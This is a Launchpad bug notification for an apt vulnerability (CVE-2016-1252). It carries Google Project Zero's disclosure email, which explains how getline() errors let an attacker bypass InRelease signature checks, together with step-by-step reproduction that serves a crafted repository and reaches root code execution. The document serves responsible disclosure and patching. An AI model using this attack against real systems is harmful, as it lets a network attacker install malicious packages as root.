This bug was fixed in the package apt - 1.0.1ubuntu2.17
---------------
apt (1.0.1ubuntu2.17) trusty-security; urgency=high
* SECURITY UPDATE: gpgv: Check for errors when splitting files (CVE-2016-1252)
Thanks to Jann Horn, Google Project Zero for reporting the issue
(LP: #1647467)
-- Julian Andres Klode <juli...@ubuntu.com> Thu, 08 Dec 2016 15:31:29
+0100
** Changed in: apt (Ubuntu Trusty)
Status: New => Fix Released
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https://bugs.launchpad.net/bugs/1647467
Title:
InRelease file splitter treats getline() errors as EOF
Status in apt package in Ubuntu:
Fix Committed
Status in apt source package in Trusty:
Fix Released
Status in apt source package in Xenial:
Fix Released
Status in apt source package in Yakkety:
Fix Released
Status in apt source package in Zesty:
Fix Committed
Bug description:
We have just been made aware of a security bug upstream that affects
the validation of signatures on InRelease file. This bug is to track
progress for it.
It allows for attacking a repository via MITM attacks, circumventing
the signature of the InRelease file.
It works by making a call to getline() fail with ENOMEM, which is not
documented as an error for that but follows from the fact that
getline() can allocate memory. In such a case, apt would treat the
first part of the file as a valid release file.
= Original bug report =
From: Jann Horn <ja...@google.com>
To: secur...@debian.org
Cc:
Date: Mon, 5 Dec 2016 18:33:09 +0100
Subject: apt: repository signing bypass via memory allocation failure
== Vulnerability ==
When apt-get updates a repository that uses an InRelease file (clearsigned
Release files), this file is processed as follows:
First, the InRelease file is downloaded to disk.
In a subprocess running the gpgv helper, "apt-key verify" (with some more
arguments) is executed through the following callchain:
gpgv.cc:main -> pkgAcqMethod::Run -> GPGVMethod::URIAcquire
-> GPGVMethod::VerifyGetSigners -> ExecGPGV
ExecGPGV() splits the clearsigned file into payload and signature using
SplitClearSignedFile(), calls apt-key on these two files to perform the
cryptographic signature verification, then discards the split files and only
retains the clearsigned original. SplitClearSignedFile() ignores leading and
trailing garbage.
Afterwards, in the parent process, the InRelease file has to be loaded again
so that its payload can be processed. At this point, the code
isn't aware anymore whether the Release file was clearsigned or
split-signed, so the file is opened using OpenMaybeClearSignedFile(), which
first attempts to parse the file as a clearsigned (InRelease) file and extract
the payload, then falls back to treating the file as the file as a
split-signed
(Release) file if the file format couldn't be recognized.
The weakness here is: If an attacker can create an InRelease file that
is parsed as a proper split-signed file during signature validation, but then
isn't recognized by OpenMaybeClearSignedFile(), the "leading garbage" that was
ignored by the signature validation is interpreted as repository metadata,
bypassing the signing scheme.
It first looks as if it would be impossible to create a file that is
recognized
as split-signed by ExecGPGV(), but isn't recognized by
OpenMaybeClearSignedFile(), because both use the same function,
SplitClearSignedFile(), for parsing the file. However, multiple executions of
SplitClearSignedFile() on the same data can actually have different non-error
results because of a bug.
SplitClearSignedFile() uses getline() to parse the input file. A return code
of -1, which signals that either EOF or an error occured, is always treated
as EOF. The Linux manpage only lists EINVAL (caused by bad arguments) as
possible error code, but because the function allocates (nearly) unbounded
amounts of memory, it can actually also fail with ENOMEM if it runs out of
memory.
Therefore, if an attacker can cause the address space in the main apt-get
process to be sufficiently constrained to prevent allocation of a large line
buffer while the address space of the gpgv helper process is less constrained
and permits the allocation of a buffer with the same size, the attacker can
use
this to fake an end-of-file condition in SplitClearSignedFile() that causes
the
file to be parsed as a normal Release file.
A very crude way to cause such a constraint on a 32-bit machine is based on
abusing ASLR. Because ASLR randomizes the address space after each execve(),
thereby altering how much contiguous virtual memory is available, an
allocation
that attempts to use the average available virtual memory should ideally
succeed
50% of the time, resulting in an upper limit of 25% for the success rate of
the
whole attack. (That's not very effective, and a real attacker would likely
want
a much higher success rate, but it works for a proof of concept.)
This is not necessarily a limitation of the vulnerability, just a limitation
of the way the exploit is designed.
I think that it would make sense to fix this as follows:
- Set errno to 0 before calling getline(), verify that it's still 0 after
returning -1, treat it as an error if errno isn't 0 anymore.
- Consider splitting the InRelease file only once, before signature
validation,
and then deleting the original clearsigned file instead of the payload
file.
This would get rid of the weakness that the file is parsed twice and
parsing
differences can have security consequences, which is a pretty brittle
design.
- I'm not sure whether this bug would have been exploitable if the parser for
split files or the parser for Release files had been stricter. You might
want
to consider whether you could harden this code that way.
== Reproduction instructions ==
These steps are probably more detailed than necessary.
First, prepare a clean Debian VM for the victim:
- download debian-8.6.0-i386-netinst.iso (it is important that this
is i386 and not amd64)
- install Virtualbox (I'm using version 4.6.36 from Ubuntu)
- create a new VM with the following properties:
- type "Linux", version "Debian (32-bit)"
- 8192 MB RAM (this probably doesn't matter much, especially
if you enable swap)
- create a new virtual harddrive, size 20GB (also doesn't matter much)
- launch the VM, insert the CD
- pick graphical install
- in the installer, use defaults everywhere, apart from enabling Xfce
in the software selection
After installation has finished, log in, launch a terminal,
"sudo nano /etc/apt/sources.list", change the "deb" line for jessie-updates
so that it points to some unused port on the host machine instead of
the proper mirror
("deb http://192.168.0.2:1337/debian/ jessie-updates main" or so).
This simulates a MITM attack or compromised mirror.
On the host (as the attacker):
$ tar xvf apt_sig_bypass.tar
apt_sig_bypass/
apt_sig_bypass/debian/
apt_sig_bypass/debian/netcat-evil.deb
apt_sig_bypass/debian/dists/
apt_sig_bypass/debian/dists/jessie-updates/
apt_sig_bypass/debian/dists/jessie-updates/InRelease.part1
apt_sig_bypass/debian/dists/jessie-updates/main/
apt_sig_bypass/debian/dists/jessie-updates/main/binary-i386/
apt_sig_bypass/debian/dists/jessie-updates/main/binary-i386/Packages
apt_sig_bypass/make_inrelease.py
$ cd apt_sig_bypass/
$ curl --output debian/dists/jessie-updates/InRelease.part2
http://ftp.us.debian.org/debian/dists/jessie-updates/InRelease
% Total % Received % Xferd Average Speed Time Time Time
Current
Dload Upload Total Spent Left Speed
100 141k 100 141k 0 0 243k 0 --:--:-- --:--:-- --:--:-- 243k
$ ./make_inrelease.py
$ ls -lh debian/dists/jessie-updates/InRelease
-rw-r--r-- 1 user user 1.3G Dec 5 17:13 debian/dists/jessie-updates/InRelease
$ python -m SimpleHTTPServer 1337 .
Serving HTTP on 0.0.0.0 port 1337 ...
Now, in the VM, as root, run "apt-get update".
It will probably fail - run it again until it doesn't fail anymore.
The errors that can occur are "Clearsigned file isn't valid" (when the
allocation during gpg verification fails) and some message about
a hash mismatch (when both allocations succeed). After "apt-get update"
has succeeded, run "apt-get upgrade" and confirm the upgrade. The result
should
look like this (server IP censored, irrelevant output removed and marked with
"[...]"):
root@debian:/home/user# apt-get update
Get:1 http://{{{SERVERIP}}}:1337 jessie-updates InRelease [1,342 MB]
[...]
Hit http://ftp.us.debian.org jessie-updates InRelease
[...]
100% [1 InRelease gpgv 1,342 MB]
28.6 MB/s 0sSplitting up
/var/lib/apt/lists/partial/{{{SERVERIP}}}:1337_debian_dists_jessie-updates_InRelease
intIgn http://{{{SERVERIP}}}:1337 jessie-updates InRelease
E: GPG error: http://{{{SERVERIP}}}:1337 jessie-updates InRelease:
Clearsigned file isn't valid, got 'NODATA' (does the network require
authentication?)
root@debian:/home/user# apt-get update
[...]
Get:1 http://{{{SERVERIP}}}:1337 jessie-updates InRelease [1,342 MB]
[...]
Hit http://ftp.us.debian.org jessie-updates InRelease
Get:4 http://{{{SERVERIP}}}:1337 jessie-updates/main i386 Packages [170 B]
[...]
Fetched 1,349 MB in 55s (24.4 MB/s)
Reading package lists... Done
root@debian:/home/user# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
netcat-traditional
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 666 B of archives.
After this operation, 109 kB disk space will be freed.
Do you want to continue? [Y/n]
Get:1 http://{{{SERVERIP}}}:1337/debian/ jessie-updates/main
netcat-traditional i386 9000 [666 B]
Fetched 666 B in 0s (0 B/s)
Reading changelogs... Done
dpkg: warning: parsing file '/var/lib/dpkg/tmp.ci/control' near line 5
package 'netcat-traditional':
missing description
dpkg: warning: parsing file '/var/lib/dpkg/tmp.ci/control' near line 5
package 'netcat-traditional':
missing maintainer
(Reading database ... 86469 files and directories currently installed.)
Preparing to unpack .../netcat-traditional_9000_i386.deb ...
arbitrary code execution reached
uid=0(root) gid=0(root) groups=0(root)
[...]
As you can see, if the attacker gets lucky with the ASLR randomization, there
are no security warnings and "apt-get upgrade" simply installs the malicious
version of the package. (The dpkg warnings are just because I created a
minimal
package file, without some of the usual information.)
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
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